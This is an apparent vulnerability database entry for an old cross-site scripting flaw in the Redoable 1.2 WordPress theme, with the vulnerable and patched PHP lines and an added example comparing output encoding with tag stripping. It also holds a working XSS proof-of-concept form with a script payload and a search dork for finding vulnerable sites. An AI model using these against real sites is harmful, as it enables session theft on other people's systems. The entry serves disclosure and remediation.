Redoable 'Index.PHP' Cross-Site Scripting Vulnerability

Vulnerability ID: 1112970
Vulnerability type: Cross-site scripting
Published: 2007-05-17
Updated: 2007-08-06
CVE ID: CVE-2007-2757
CNNVD ID: CNNVD-200705-391
Platform: PHP
CVSS score: 6.8
|Sources
https://www.exploit-db.com/exploits/30050
https://www.securityfocus.com/bid/24037
https://cxsecurity.com/issue/WLB-2007050073
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-391
|Details
Multiple cross-site scripting vulnerabilities exist in Redoable. A remote attacker can inject arbitrary web script or HTML via the s parameter submitted to (1) wp-content/themes/redoable/searchloop.php or (2) wp-content/themes/redoable/header.php.
|Exploit
source: http://www.securityfocus.com/bid/24037/info

Redoable is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Redoable 1.2 is vulnerable; other versions may also be affected. 

<!--
Redoable 1.2 - Cross-Site Scripting Vulnerability

---------------
Vulnerable Code
---------------

header.php (line 6):
...
elseif (is_search()) { ?> Search for <?php echo $s; }
...

searchloop.php (line 24):
elseif (is_search()) { printf(__('Search Results for \'%s\'','redo_domain'), $s); }

------------
Patched Code
------------

header.php (line 6 FIXED):
...
elseif (is_search()) { ?> Search for <?php echo strip_tags($s); }
...

searchloop.php (line 24 FIXED):
elseif (is_search()) { printf(__('Search Results for \'%s\'','redo_domain'), strip_tags($s)); }

Vulnerable Variable: s
Vulnerable File: wp-content/themes/redoable/searchloop.php and header.php
Vulnerable: Redoable 1.2 (other versions should also be vulnerable)
Google d0rk: "and Redoable 1.2"

John Martinelli
john@martinelli.com
RedLevel Security
http://www.RedLevel.org
May 17th, 2007
-->
<html>
<head><title>Redoable 1.2 - Cross-Site Scripting Vulnerability</title></head>
<body>
<center><br><br>
<font size=4>Redoable 1.2 - Cross-Site Scripting Vulnerability</font><br>
<font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a> of <a href="http://redlevel.org">RedLevel Security</a><br><br>
Google d0rk: <a href="http://www.google.com/search?q=%22and+Redoable+1.2%22">"and Redoable 1.2"</a>
</font><br><br><br>
<center>file <b>index.php</b> - variable <b>s</b> - method <b>get</b></center><br>
<form action="http://www.example.com/index.php" method="get">
<input size=75 name="s" value="</title><script>alert(1)</script>">
<input type=submit value="Execute XSS Attack" class="button">
</form>
<br><br><br>
</center>
</body></html>
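Both fixes in the advisory wrap the search term in strip_tags(). As an added example (not the theme's code and not part of the advisory), the plain-PHP script below renders the same search term $s three ways: the original raw echo from header.php, the advisory's strip_tags() patch, and context-appropriate output encoding with htmlspecialchars(), which is the fix a reviewer would ask for in an HTML text or title context. The input string is constructed to match the advisory's proof-of-concept value; the render_* function names are invented for this example.

```php
<?php
// Added example, not the Redoable theme's code. Shows why output encoding,
// not tag stripping, is the right fix for an echo into HTML text.

// Constructed input: the same value the advisory's PoC form submits as "s".
$s = '</title><script>alert(1)</script>';

// 1. Vulnerable pattern from header.php: the raw term is echoed into the page,
//    so the browser parses it as markup.
function render_raw(string $s): string {
    return 'Search for ' . $s;
}

// 2. The advisory's patch: strip_tags() deletes anything shaped like a tag.
//    The payload's tags vanish here, but nothing is encoded, so the result still
//    depends on a heuristic and on the output context being plain text.
function render_strip_tags(string $s): string {
    return 'Search for ' . strip_tags($s);
}

// 3. Output encoding: every HTML metacharacter (<, >, &, ", ') becomes an entity,
//    so whatever the term contains can only ever be displayed, never executed.
function render_encoded(string $s): string {
    return 'Search for ' . htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

foreach (['render_raw', 'render_strip_tags', 'render_encoded'] as $fn) {
    printf("%-18s %s\n", $fn . ':', $fn($s));
}
```

Running this prints the raw line with the script tag intact, the strip_tags() line reduced to "Search for alert(1)", and the encoded line with every angle bracket turned into &lt; and &gt;. The encoded form is the one to ship: it is independent of what the attacker's string looks like and of how clever the tag-stripping heuristic is. Inside WordPress, the same effect for the search term is what the core get_search_query() helper provides.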
|Affected products
deanjrobinson.com Redoable 1.2
|References

Source: BUGTRAQ
Name: 20070517 RedLevel Advisory #015 - Redoable 1.2 Cross-Site Scripting Vulnerability (patch included)
Link: http://www.securityfocus.com/archive/1/archive/1/468892/100/0/threaded
Source: OSVDB
Name: 37041
Link: http://osvdb.org/37041
Source: OSVDB
Name: 37040
Link: http://osvdb.org/37040
Source: XF
Name: redoable-header-searchloop-xss(34363)
Link: http://xforce.iss.net/xforce/xfdb/34363
Source: BID
Name: 24037
Link: http://www.securityfocus.com/bid/24037
Source: SREASON
Name: 2721
Link: http://securityreason.com/securityalert/2721
Source: SECUNIA
Name: 25310
Link: http://secunia.com/advisories/25310
Source: MISC
Link: http://redlevel.org/wp-content/uploads/redoable.txt